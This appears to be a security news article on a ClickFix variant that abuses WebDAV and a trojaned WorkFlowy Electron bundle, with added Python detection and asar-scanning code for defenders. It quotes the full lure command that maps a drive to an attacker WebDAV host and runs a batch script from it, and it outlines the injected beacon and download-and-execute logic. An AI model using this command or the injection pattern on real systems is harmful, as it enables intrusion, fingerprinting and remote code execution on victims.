Ethical Hacking News
A new variant of the popular ClickFix technique has been observed abusing WebDAV to deliver a malicious payload. Instead of the PowerShell or mshta one-liners seen in earlier campaigns, the pasted command uses "net use" to map a drive letter to an attacker-controlled WebDAV share and then runs a ".cmd" batch file from that drive. The script downloads a ZIP archive, unpacks it, and launches the legitimate WorkFlowy desktop application, whose Electron ".asar" bundle has been modified to carry malicious logic. Read on for how the chain works and what it means for defenders.
ClickFix lures have the victim execute the first stage themselves, and threat actors keep reworking that stage to stay ahead of controls tuned to the usual loaders. This variant replaces the download engine with a WebDAV drive mapping, which gives the operators a quieter initial execution, while the later stages ride on a signed, trusted application.
This attack chain was first described by Atos researchers, who noticed the attackers using "net use" to connect to a remote server instead of the PowerShell or mshta execution engines typical of ClickFix. Mapping a network drive and executing a batch script from it is an uncommon approach in ClickFix attacks, and it offers threat actors increased stealth and evasion against controls that key on the older loaders.
The initial phase of the attack is a phishing website posing as a captcha check, "happyglamper[.]ro". The user is told to open the Run dialog with "Win+R", press "Ctrl+V" to paste the command the page has copied to the clipboard, and hit "Enter". The pasted command is:
"cmd.exe" /c net use Z: https://94.156.170[.]255/webdav /persistent:no && "Z:\update.cmd" & net use Z: /delete
Read left to right: "net use" maps drive Z: to the attacker's WebDAV share (the WebDAV redirector accepts an http(s) URL directly); "/persistent:no" keeps the mapping from being restored at the next logon; "&&" runs "Z:\update.cmd" only if the mapping succeeded; and the trailing "& net use Z: /delete" removes the mapping regardless of how the script ends. In previous ClickFix campaigns the pasted command typically used PowerShell or mshta to download and execute the next stage.
This variant instead uses "net use" to map a network drive from an external server and executes a batch script from it. While neither WebDAV mapping nor batch execution is novel, these TTPs had not been seen in ClickFix attacks before, and the change gives adversaries a good chance of evading defensive controls tuned to the older loaders and staying under the radar of defenders.
The initial execution script, "update.cmd", is loaded from the mapped drive and executed; afterwards the mapped drive is removed. The batch file launches a PowerShell instance that downloads a ZIP archive and extracts it into the "%LOCALAPPDATA%\MyApp\" directory, then executes the "WorkFlowy.exe" binary from it.
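The command line above leaves a distinctive footprint in process-creation telemetry. The Python below is an added example, not code from the article or from the Atos researchers: it triages Sysmon-style events (Image, ParentImage, CommandLine fields) for the combination this variant produces in one line: a "net use" whose target is a WebDAV endpoint, a script run from the drive letter mapped in that same line, the mapping torn down in the same line, and cmd.exe spawned by explorer.exe, which is what the Win+R Run dialog does. It goes a little beyond the article's command by also matching the UNC spellings the WebDAV redirector accepts (\\host@SSL\share, \\host@8080\DavWWWRoot). The sample events, the 203.0.113.10 address and the indicator names are constructed for the example.

```python
"""Triage process-creation events for the "net use" + WebDAV ClickFix pattern.

Added example, not the article's or the researchers' code. Events use Sysmon
Event ID 1 field names (Image, ParentImage, CommandLine); every event below is
constructed for the example and 203.0.113.10 is a documentation address.
"""
import re

# "net use" whose target is a WebDAV endpoint: a bare http(s) URL, as in the
# article's pasted command, or the UNC spellings the WebDAV redirector takes
# (\\host@SSL\share, \\host@8080\DavWWWRoot).
WEBDAV_NET_USE = re.compile(
    r"\bnet(?:\.exe)?\s+use\b[^&|]*?(?:https?://|\\\\[^\s\\]+@(?:SSL|\d+)\\)", re.I)

# A .cmd/.bat/.exe launched from the same drive letter that the preceding
# "net use" in this command line just mapped.
RUN_FROM_MAPPED = re.compile(
    r'\bnet(?:\.exe)?\s+use\s+([A-Za-z]):[^&|]*(?:&&|&|\|\|)\s*"?\1:\\[^\s"]+'
    r"\.(?:cmd|bat|exe|vbs|js)\b", re.I)

# The mapping removed again in the same line: the cleanup the article describes.
DELETE_IN_LINE = re.compile(r"\bnet(?:\.exe)?\s+use\s+[A-Za-z]:\s+/delete\b", re.I)


def indicators(event):
    """Return the indicator names that fire on one process-creation event."""
    cmd = event.get("CommandLine", "")
    hits = []
    if WEBDAV_NET_USE.search(cmd):
        hits.append("net_use_webdav_target")
    if RUN_FROM_MAPPED.search(cmd):
        hits.append("exec_from_just_mapped_drive")
    if DELETE_IN_LINE.search(cmd):
        hits.append("drive_deleted_same_line")
    # Win+R runs its command as a child of explorer.exe, so cmd.exe under
    # explorer.exe with "net use" on its command line is the pasted lure, not a
    # logon script or an admin's console session.
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    if (parent.endswith("\\explorer.exe") and image.endswith("\\cmd.exe")
            and re.search(r"\bnet\s+use\b", cmd, re.I)):
        hits.append("cmd_from_run_dialog_with_net_use")
    return hits


def triage(events, min_hits=2):
    """Return (index, hits) for events where at least min_hits indicators fire."""
    scored = ((i, indicators(e)) for i, e in enumerate(events))
    return [(i, h) for i, h in scored if len(h) >= min_hits]


SAMPLE_EVENTS = [
    # 0: the pasted ClickFix command as the article shows it (address swapped)
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"cmd.exe" /c net use Z: https://203.0.113.10/webdav /persistent:no'
                    r' && "Z:\update.cmd" & net use Z: /delete'},
    # 1: the net.exe child that cmd.exe spawns for the mapping itself
    {"Image": r"C:\Windows\System32\net.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"net use Z: https://203.0.113.10/webdav /persistent:no"},
    # 2: benign SMB mapping from a logon script
    {"Image": r"C:\Windows\System32\net.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"net use H: \\fileserver01\home /persistent:yes"},
    # 3: an admin mapping an SMB share by hand from the Run dialog
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c net use H: \\fileserver01\home"},
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"], hits)
```

The threshold matters: the net.exe child of the lure fires one indicator, and so does an administrator mapping an SMB share from the Run dialog, so alerting on any single match would be noisy; the pasted command fires all four in one event, which is what makes it cheap to spot.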
The WorkFlowy desktop application, signed by the developer "FunRoutine Inc." and distributed as an Electron application bundle, carries malicious code injected into main.js, the Node.js entry point of the app, inside the app.asar archive. Electron loads that JavaScript from resources\app.asar next to the executable; the Authenticode signature covers WorkFlowy.exe, not the archive, so unless the build enables Electron's ASAR integrity check the modified bundle runs under a valid signature. The injected code provides several functions:
* Malware executes before the legitimate application starts: the injected IIFE opens with await f(), the infinite C2 beacon loop, so the beacon is started before the app's own startup code runs.
* Persistent victim fingerprinting via %APPDATA%\id.txt: a random 8-character alphanumeric ID is generated on first run and written to %APPDATA%\id.txt. On subsequent runs the stored ID is read back, giving the attacker a stable identifier for each victim machine across sessions.
* C2 beacon that exfiltrates host identity every 2 seconds: function u() sends an HTTP POST containing the victim's unique ID, machine name and Windows username to the C2 server; the loop in f() repeats this indefinitely at a 2-second interval.
* Remote payload download and execution: function p() receives a task object from the C2, decodes base64-encoded file contents, writes them to a timestamped directory under %TEMP%, and executes any .exe via child_process.exec.
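For a defender handed the dropped WorkFlowy bundle, the question is whether resources\app.asar still matches what the vendor ships. The Python below is an added example, not code from the article, the researchers or the WorkFlowy project: it parses an asar image (the public format: an 8-byte size pickle, a JSON header pickle, then file bodies at offsets relative to the end of the header), locates the entry script named by package.json's "main" field, and checks it for the traces the four findings above leave behind: a child_process require, os.hostname()/os.userInfo() fingerprinting, the id.txt filename, base64 decoding into a temp directory, and an async IIFE placed ahead of app.whenReady(). The builder, the indicator names and both sample archives are constructed for this example; the trojaned sample is an inert skeleton carrying those strings, not the malware.

```python
"""Inspect an Electron app.asar for the injected entry-script pattern above.

Added example, not code from the article, the researchers or WorkFlowy. The
parser follows the public asar layout; the indicator regexes and both samples
are constructed here, and the trojaned sample is an inert skeleton, not malware.
"""
import json, re, struct


def build_asar(files):
    """Pack {path: bytes} into a flat asar image (used here only to build samples)."""
    header, blob = {"files": {}}, b""
    for name, data in files.items():
        header["files"][name] = {"size": len(data), "offset": str(len(blob))}
        blob += data
    js = json.dumps(header).encode()
    payload = struct.pack("<I", len(js)) + js + b"\0" * (-len(js) % 4)  # pickle string, 4-aligned
    header_buf = struct.pack("<I", len(payload)) + payload
    return struct.pack("<II", 4, len(header_buf)) + header_buf + blob


def parse_asar(buf):
    """Return (offset where file bodies start, {path: entry}); walks nested dirs."""
    size_payload, header_size = struct.unpack_from("<II", buf, 0)
    if size_payload != 4 or header_size + 8 > len(buf):
        raise ValueError("not an asar archive")
    (json_len,) = struct.unpack_from("<I", buf, 12)
    header, entries = json.loads(buf[16:16 + json_len]), {}

    def walk(node, prefix):
        for name, meta in node["files"].items():
            path = f"{prefix}/{name}" if prefix else name
            if "files" in meta:
                walk(meta, path)
            else:
                entries[path] = meta

    walk(header, "")
    return 8 + header_size, entries


def read_entry(buf, base, meta):
    """Bytes of one entry, or None if it is stored outside in app.asar.unpacked."""
    if meta.get("unpacked"):
        return None
    off = base + int(meta["offset"])
    return buf[off:off + meta["size"]]


# Strings the article's four findings leave behind in main.js.
INDICATORS = {
    "child_process_exec": re.compile(r"require\(\s*['\"]child_process['\"]\s*\)"),
    "host_fingerprint": re.compile(r"os\.(?:hostname|userInfo)\s*\("),
    "victim_id_file": re.compile(r"\bid\.txt\b"),
    "base64_payload_decode": re.compile(r"Buffer\.from\([^)]*['\"]base64['\"]\s*\)"),
    "temp_drop_dir": re.compile(r"os\.tmpdir\(\)|process\.env\.TEMP\b"),
}


def scan_main(src):
    """Return indicator names found in the entry script; order follows INDICATORS."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(src)]
    # First finding: an async IIFE placed ahead of app.whenReady() runs before
    # the application's own startup code.
    iife, ready = src.find("(async () =>"), src.find("app.whenReady(")
    if iife != -1 and (ready == -1 or iife < ready):
        hits.append("async_iife_before_whenReady")
    return hits


def scan_asar(buf):
    """Find the entry script via package.json "main" (default main.js) and scan it."""
    base, entries = parse_asar(buf)
    entry = "main.js"
    if "package.json" in entries:
        pkg = json.loads(read_entry(buf, base, entries["package.json"]) or b"{}")
        entry = pkg.get("main", entry).lstrip("./")
    if entry not in entries:
        return {"entry": entry, "indicators": ["entry_missing"]}
    src = read_entry(buf, base, entries[entry])
    if src is None:
        return {"entry": entry, "indicators": ["entry_unpacked"]}
    return {"entry": entry, "indicators": scan_main(src.decode("utf-8", "replace"))}


# Constructed samples (not real WorkFlowy files).
PKG = b'{"name": "sample", "main": "./main.js"}'
CLEAN_MAIN = b"""const { app, BrowserWindow } = require('electron');
app.whenReady().then(() => new BrowserWindow({ width: 800, height: 600 }));
"""
# Shape of the injection only (IIFE ahead of whenReady, id file, host fingerprint);
# no C2 address, loop, download or exec body.
TROJANED_MAIN = b"""const { app, BrowserWindow } = require('electron');
const os = require('os'), fs = require('fs'), path = require('path');
const { exec } = require('child_process');
(async () => {
  const idFile = path.join(process.env.APPDATA, 'id.txt');
  const id = fs.existsSync(idFile) ? fs.readFileSync(idFile, 'utf8') : '';
  const beacon = JSON.stringify({ id, host: os.hostname(), user: os.userInfo().username });
  // ...POST beacon; write Buffer.from(task.data, 'base64') under os.tmpdir(); exec(...)
})();
app.whenReady().then(() => new BrowserWindow());
"""
CLEAN_ASAR = build_asar({"package.json": PKG, "main.js": CLEAN_MAIN})
TROJANED_ASAR = build_asar({"package.json": PKG, "main.js": TROJANED_MAIN})
```

Indicator hits are a triage signal, not proof: the decisive check is to extract the entry script with parse_asar and read_entry and diff it against the same file from a build downloaded from the vendor. Entries flagged "unpacked" live in app.asar.unpacked on disk and need to be read from there.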
The ClickFix technique has been widely used by threat actors to deliver malicious payloads, and this variant changes only the execution stage: a WebDAV share mapped with "net use", a batch file run from the mapped drive, and a signed Electron application whose app.asar was rewritten. Each of those steps is visible to defenders who look for it: a "net use" whose target is an http(s) URL or a WebDAV UNC, a script executed from a drive letter that was mapped and deleted in the same command line, and Electron bundles whose app.asar no longer matches the vendor's. The recurring lesson of ClickFix is that the victim types the first stage themselves, so user awareness of the "paste this into Run to fix the captcha" lure remains as important as the telemetry.
Related Information:
https://www.ethicalhackingnews.com/articles/New-ClickFix-Variant-Exploits-WebDAV-to-Deliver-Malicious-Payload-ehn.shtml
https://thehackernews.com/2026/03/investigating-new-click-fix-variant.html
https://www.microsoft.com/en-us/security/blog/2026/02/05/clickfix-variant-crashfix-deploying-python-rat-trojan/
Published: Fri Mar 13 08:44:32 2026 by llama3.2 3B Q4_K_M